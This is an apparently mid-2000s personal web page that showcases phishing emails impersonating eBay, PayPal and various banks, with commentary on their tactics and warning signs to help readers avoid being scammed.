Phishing Scam Showcase
Here is a sampling of phishing scam e-mail messages that have made their way into my e-mail inbox. I have decided against posting each and every one I receive since many of them are very similar and I often receive many of them for the more popular targets like eBay and PayPal.
My hope is that someone who has received one of these messages will decided to to search the Internet in an attempt to determine if the message is legitimate and may find some of this information and avoid being victimized.
Wells Forgo - No, that's not a typo on my part.These obvious amateur phishermen had a field day with the name "Wells Fargo." First the idiots wrote "Wells Falgo" in the "From:" line of the e-mail and then opened with "Dear Wells Forgo customer." If nothing else, sometimes these things can provide a good laugh.
Armed Forces Bank - Although I have personally never heard of Armed Forces Bank, apparently, these phishermen have.
It's the usual scam with link that appears to lead to the legitimate bank web site, but actually takes you to a phishing site set up in Taiwan. As of 8:00 a.m. EDT on 8/20/2005, the site was still online, and was, according to an Armed Forces Bank spokesman, shut down very soon after.
To see the original message, click here.
eBay - Here is a very typical eBay phishing e-mail. Once again, their "handy" link where it reads "Click Here" leads to their phony eBay web site where they will capture any login info that is entered.
They add a little pain to the sense of urgency by claiming you would have to pay $350 to reactivate your eBay account. I'm not a big eBay user, so I can't say for certain, but I would be very surprised if that were an actual eBay policy! These phishermen sound a bit desperate!
You can view the original e-mail message, complete with eBay logos, here.
PayPal - Here's a very typical phishing e-mail. Since I have reproduced this message in plain text format, you cannot see all the code they used in the original HTML format message that was sent.
The web link you see below is what appeared in the original message, but what is shown is not the real destination the link will take you to. Despite what the link appears to be, the code behind the link was really pointing to the phishermen's phony web site, which was, of course, set up to capture PayPal login info.
Many e-mail client programs such as Outlook 2003 will display a small pop-up when you hover your mouse over web links that appear within e-mail addresses. The pop-up displays the actual web link that may be hidden in the code in an attempt to trick victims into clicking on the link.
Bank of The West - This first one is being rather heavily promoted since I have received no less than six separate copies of this one. These guys are persistent and are presenting a moving target to authorities that are likely trying to track them down by changing the location of their phony site after the first one was shut down.
The first two messages I received have a link to the same web site which was hosted in Korea and has since been shut down. The last four messages I have received have links to the same web site which is hosted on China and is still online as of this writing.
Most of these phishing scams do attempt to lead victims to imposter web sites hosted on servers based in China or Korea in my experience.
These guys actually had the gall to copy the "Fraud Alert - What you should know about PHISHING" link from the actual Bank of The West web site to make their site look authentic! How do you like that, a warning about phishing right on the front page of a phishing site!
For fun, I put in some bogus information on the login screen of the phony web site (while sharing a few choice words with them) to see where it led me. It then took me to another screen where it offered to "Renew my eTimeBanker" and asked for a bunch more info, like ATM card number, PIN and e-mail address.
After I fed it some more bogus info, it informed me that "You have renew your eTimeBanker" -- the bad English is often a give away. It then forwarded me off to the legitimate Bank of The West web site. How thoughtful of them to save people the trouble of typing it in themselves as they (should be) racing to the genuine Bank of The West web site to change their password as they are dialing the bank on the telephone.
PayPal Verified - This one is a phony PayPal message and encourages the reader to "get verified" by following the link to their PayPal imposter site which has since been shut down.
Also included in the message were images from the genuine PayPal web site to make it look more authentic.
With millions of PayPal accounts out there, there is little doubt that these phishermen bagged their share of unsuspecting victims before their site was located and shut down by authorities.
Bank of The West - Maybe persistence pays off for these maggots. I have never seen a more persistent phishing scam than this one! I have received no less than 20 of these e-mail messages. If it is the same group that is sending all of these, they must be jumping from server to server like crazy in order to keep their phony sites online.
PayPal Account Review Team - Typical PayPal phishing scam. The original message had the official-looking PayPal logo as part of the message and the web address that their link pointed to contained "paypal" as part of the link to make it look more genuine.
eBay Phishing Scam - Here's a typical eBay phishing scam. The writing is not so hot, so that gives a tip-off that it is bogus. They did manage to snag a good domain name for a phishing expedition however. They're links were pointing to a domain with the name e-bay-service-update.com, although I have removed the actual links from the message before posting it here.
"Unusual Activity" PayPal Scam - This is one of the better executed phishing scam messages I have seen lately. It looks quite official and the writing is all quite nicely done. They have the typical authentic-looking link they want you to think will connect you to the PayPal web site, but as usual, the underlying code actually directs you to their phishing web site.
Bank of America Phishing Scam - The latest Bank of America Phishing scam I have received.
eBay Phishing Scam With A Twist - I had not received a phishing scam e-mail message quite like this one before. The mail message was in HTML format, which is not unusual at all, however, they included some code in there to include a very authentic looking eBay login screen right inside the message.
All of the logos and image links have been linked to display from eBay's actual site, but the login screen won't actually allow you to log into eBay. Instead, it collects your User ID and password and then sends them via e-mail to the scam's creator. A pretty clever twist on the usual phishing e-mail message. I guess they're always trying to make things easier for their victims!
EBay Phishing Scam With Bad English - One very quick and easy way to spot some of these scams is the bad English that they often use. You would think that they would put a little extra effort into finding a partner in crime that could help them with their English after all the trouble they have gone through to launch this scam.
University Credit Union - These guys managed to get a domain registered that was pretty close the the actual University Credit Union domain name. They managed to get hold of "update.ucu.edu.tf" which is actually an educational domain reserved for the French Southern Territories, but a quick glance at that might be enough to fool a few victims.
eBay Member Message (From 'cdaniel') Scam - This is a brand-new one, at least for me it is. This one actually had me thinking it might be the real thing for a few moments. It's a clever idea and is no doubt designed to incite a bit of panic on the victim's part. A quick check of the URL this scam is directing victims to reveals that it is not an eBay site at all. Just another phising site set up to capture eBay usernames and passwords. You can log into the real eBay and check your messages there to confirm that this is indeed just another scam.
Fulton Bank - Very typical bank scam where the crooks are simply trying to get customers of the bank to visit their imposter web site so they can capture their login info.
Colonial Bank - The only difference between this one and the previous one is the name of the bank. Oh yeah, probably different low-life scum that are perpetrating it also.
Shazam Bank - Another bank or financial institution I have never heard of. That does not prevent the phishermen of the Internet Sea from casting their net in my direction however. Do you suppose a die-hard "Gomer Pyle" fan founded that company?
Amcore Bank - Phishermen never seem to run out of ideas to add more urgency to their scam messages in order to incite panic in their intended victims. This is the first time I have personally seen them include data that supposedly identifies the origin of an attempt to access an account. I seriously doubt that any financial institution would include this kind of information in a report of this nature, but these maggots will try anything to scare their victims into action.
Bank of Oklahoma - Run-of-the-mill phishing scam. Nothing special here, but since I don't have anything listed here from Bank of Oklahoma, I will include it.
eBay Fraud Mediation Request - Although this is a pretty typical eBay phishing scam, I thought it deserved a position in the showcase since these phishermen put a lot of effort into making their e-mail message look authentic. They are also using this new tactic that provides identifying information for someone that has supposedly attempted to access your eBay account.
J.P. Morgan Chase - All-too-typical and rather boring phising scam e-mail. As usual, they try to inject a sense of urgency into their scheme by laying down a deadline that must be met to keep the account open.
Wells Fargo Account Security Measures - Somewhat of a new twist for the phishing scams I usually see. These crooks are trying to get people to believe that Wells Fargo has implemented some new Internet security features and that customers must log in to update their account info.
